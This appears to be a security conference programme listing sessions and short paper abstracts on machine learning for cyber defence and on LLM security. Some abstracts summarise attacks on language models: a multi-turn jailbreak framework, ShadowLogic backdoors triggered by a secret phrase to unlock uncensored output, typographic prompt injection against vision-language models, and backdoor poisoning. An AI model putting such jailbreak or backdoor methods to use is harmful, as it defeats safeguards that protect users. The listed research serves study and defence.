Speakers: Dr. Rachel Allen and Becca Lynch

Speaker: Hyrum Anderson

Speaker: Niloofar Mireshghallah, Incoming Assistant Professor, Carnegie Mellon University (EPP & LTI)/Research Scientist, FAIR

About: This session focuses on research directly addressing the vulnerabilities, attack methods, and defensive strategies for Large Language Models (LLMs) and Visual Language Models (VLMs).

A Framework for Adaptive Multi-Turn Jailbreak Attacks on Large Language Models

Speaker: Javad Rafiei Asl

This paper introduces HarmNet, a modular framework designed to systematically construct, refine, and execute multi-turn jailbreak queries against LLMs, demonstrating significantly higher attack success rates compared to prior methods.

LLM Salting: From Rainbow Tables to Jailbreaks

Speaker: Tamás Vörös

This work proposes LLM salting, a lightweight defense mechanism that rotates the internal refusal direction of LLMs, rendering previously effective jailbreak prompts (like GCG) ineffective without degrading model utility.

ShadowLogic: Hidden Backdoors in Any Whitebox LLM

Speaker: Amelia Kawasaki

This paper unveils ShadowLogic, a method for injecting hidden backdoors into white-box LLMs by modifying theircomputational graphs. These backdoors are activated by a secret trigger phrase, allowing the model to generate uncensored responses and exposing a new class of graph-level vulnerabilities.

Text2VLM: Adapting Text-Only Datasets to Evaluate Alignment Training in Visual Language Models

Speaker: Jake Thomas

This research presents Text2VLM, a novel pipeline that adapts text-only datasets into multimodal formats to evaluate the resilience of Visual Language Models (VLMs) against typographic prompt injection attacks. It highlights the increased susceptibility of VLMs when visual inputs are introduced.

About: This session explores the application of AI and Machine Learning, particularly agentic systems and reinforcement learning, to enhance active cyber defense and security operations.

Adaptive by Design: Contextual Reinforcement Learning for Mission-Ready Cyber Defence

Speaker: Jake Thomas

This paper introduces a framework for applying Contextual Reinforcement Learning (cRL) to cyber defense, where agents dynamically incorporate contextual signals (like mission objectives or threat assessments) to modulate their policies in real-time without retraining.

Towards a Generalisable Cyber Defence Agent for Real-World Computer Networks"

Speaker: Tim Dudman

This work proposes Topological Extensions for Reinforcement Learning Agents (TERLA) to provide generalizability for cyber defense agents in networks of differing topology and size without the need for retraining. It evaluates performance in realistic simulation environments.

Improving Accuracy and Consistency in Real-World Cybersecurity AI Systems via Test-Time Compute

Speaker: Ashley Song

This study evaluates Test-Time Compute for improving the accuracy and consistency of real-world cybersecurity agentic systems, specifically a container vulnerability analysis agent and a server alert triage agent.

RIG-RAG: A GraphRAG Inspired Approach to Agentic Cloud Infrastructure

Speaker: Benji Lilley

This paper introduces Relational Inference GraphRAG (RIG-RAG), an LLM-assisted pipeline that transforms cloud configuration data into a security-enriched knowledge graph to support natural-language reasoning about deployed infrastructure. This enhances agentic capabilities for cloud security operations.

Speakers: Dr. Rachel Allen and Becca Lynch

Co-hosted with Align; registration required

Speakers: Dr. Rachel Allen and Becca Lynch

Speaker: Hyrum Anderson

Speaker: Nathaniel Fick, CEO/Investor/U.S. Ambassador/Marine/Author

After building the cybersecurity software company Endgame, Nate Fick served from 2022-2025 as the inaugural U.S. Ambassador for Cyberspace & Digital Policy at the Department of State, leading American diplomacy around the world on technology issues including cybersecurity, digital infrastructure, digital regulatory policy, and emerging technologies. From Kyiv to Beijing, and from Brussels to Delhi, he was on the frontlines of the competition to shape the 21st century -- a competition increasingly decided by key technologies. His keynote shares lessons relevant to citizens, investors, and company-builders alike.

About: This session focuses on diverse methods for identifying, analyzing, and understanding various types of cyber threats and vulnerabilities, ranging from malware and code flaws to social and financial fraud.

MADAR: Efficient Continual Learning for Malware Analysis with Diversity-Aware Replay

Speaker: Mohammad Saidur Rahman

This study proposes MADAR, a Continual Learning (CL) framework for malware classification, which addresses catastrophic forgetting by incorporating diversity-aware replay. It demonstrates improved detection accuracy for both Windows and Android malware datasets.

Reason. Search. Retrieve. Repeat. Iterative Retrieval for Automating Vulnerable Code Discovery

Speaker: Supriti Vijay

This paper presents a multi-turn retrieval architecture for automating vulnerable code discovery, where models iteratively generate and refine search queries. It introduces a reinforcement learning environment and dataset for training such strategies.

Social Attack Surfaces: Emerging Cybersecurity Threats in Open Source Collaboration

Speaker: Christopher Honaker

This research examines social interactions in open-source code repositories using a biased BERTopic model to identify emerging cybersecurity threats (e.g., the XZ Utils backdoor) by prioritizing negative sentiment and cybersecurity keywords.

Adversarial Machine Learning Attacks on Financial Reporting via Maximum Violated Multi-Objective Attack

Speaker: Edward Raff

This work explores Adversarial Machine Learning (AML) attacks on financial reporting, demonstrating how bad actors can manipulate financial statements to inflate earnings and reduce fraud scores simultaneously, highlighting a critical information security vulnerability in financial systems.

About: This concluding session addresses practical, real-world applications of machine learning in Security Operations Centers (SOCs), focusing on detection frameworks, authentication security, and advanced threat intelligence.

Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework

Speaker: Sadegh Momeni

This paper proposes a two-stage hybrid framework for ML-based threat detection in enterprise security, combining loose YARA rules with an ML classifier and leveraging synthetic data generation (Simula) and active learning to achieve a self-sustained, low-overhead solution for SOCs.

Evaluating Risk-Based Authentication Effectiveness in Production 2FA Systems

Speaker: Steven Leung

This study provides the first large-scale empirical evaluation of Risk-Based Authentication (RBA) effectiveness in production two-factor authentication (2FA) systems against real-world opportunistic, targeted, and advanced attacks. It demonstrates how heuristic and anomaly detection methods improve security while maintaining user experience.

LLM ATT&CK Navigator: Mapping Observed Generative Adversarial Techniques Across the Cyber Killchain

Speaker: Kyla Guru

This work introduces the LLM ATT&CK Navigator, an interactive tool that maps real-world instances of AI-enabled misuse onto the MITRE ATT&CK Killchain and calculates enablement risks. This provides actionable insights into current adversarial tactics for defensive prioritization.

Speakers: Becca Lynch and Hyrum Anderson

CAMLIS Posters

1. A Platform for Rapidly Developing and Deploying Protection Against Large Language Models Attacks

   Presenter: Konstantin Berlin

2. Accelerating Cyber Defense with Applied Open-Weight LLMs

   Presenter: Ryan Fetterman

3. Anomaly Detection Betrayed Us, so We Gave It a New Job: Enhancing Command-Line Classification with Benign Anomalous Data

   Presenter: Ben Gelman

4. Base Rate Measurement and Precision Forecasting

   Presenter: Michael Slawinski

5. Benchmarking Agentic LLMs for Vulnerability Management: Exposing and Mitigating Situational Awareness Bias

   Presenter: Dmitrijs Trizna

6. Causal Reinforcement Learning for Labelling Optimization in Cyber Anomaly Detection

   Presenter: Susan Babirye

7. Dynamic Graph Structure for Tracking Cluster Evolution and LLM Summarization

   Presenter: Michael Slawinksi

8. Evaluating LLM Generated Detection Rules in Cybersecurity

   Presenter: Anna Bertiger

9. Glass-box triage: An explainable-by-design LLM-ML-Human framework for high scale production threat detection

   Presenter: Caleb Fogleman

10. Harnessing Large Language Models for Detection of AI Generated Attacks

    Presenter: Abhishek Singh

11. Mutually-exciting point processes and topic modelling of honeypot computer terminal data

    Presenter: Daniyar Ghani

12. Offensive Security for AI Systems: Concepts, Practices, and Applications

    Presenter: Josh Harguess

13. PentestJudge: Autonomous Process Evaluation for AI Security Agents

    Presenter: Shane Caldwell

14. RADAR: Open-Source Detection of Agentic Deception and Alignment Risk in LLMs

    Presenter: Edward Joseph

15. RoleSentry: A Multi-Stage Framework for Explainable Detection of AWS Role Chaining Attacks

    Presenter: Godwin Attigah

CAMLIS Red Posters

1. Ask What Your Country Can Do For You: Towards a Public Red Teaming Model

   Presenter: Wm. Matthew Kennedy

2. Detecting Complex Vulnerabilities in Real-World Code - New Benchmark for Enhanced Software Security

   Presenter: Klaudia Kloc

3. LLM backdoor poisoning: attacks and detections

   Presenter: Nir Rosen

Speakers: Rich Harang

Attack Surfaces in Computer Use Agents: A Practical Taxonomy .

Speaker: Daniel Jones

Accelerating AI red teaming operations with the Python Risk Identification Tool (PyRIT)

Speaker: Nina Chikanov

BlackIce: A Containerized Red Teaming Toolkit for AI Security Testing

Speaker: Alexander Warnecke

An Agent-Based Framework for Adversarial Simulation and Blue Teaming

Speaker: Gary Lopez Munoz

ScamAgents: How AI Agents Can Simulate Human-Level Scam Calls.

Speaker: Sanket Badhe

Importing Phantoms: Measuring LLM Package Hallucination Vulnerabilities

Speaker: Arjun Krishna

PD-AutoR: Towards Automatic Restoration of Poisoned Examples in Machine Learning

Speaker: Xinyu Lei

Red Teaming AI Red Teaming

Speaker: Subhabrata Majumdar

Speakers: Rich Harang and Becca Lynch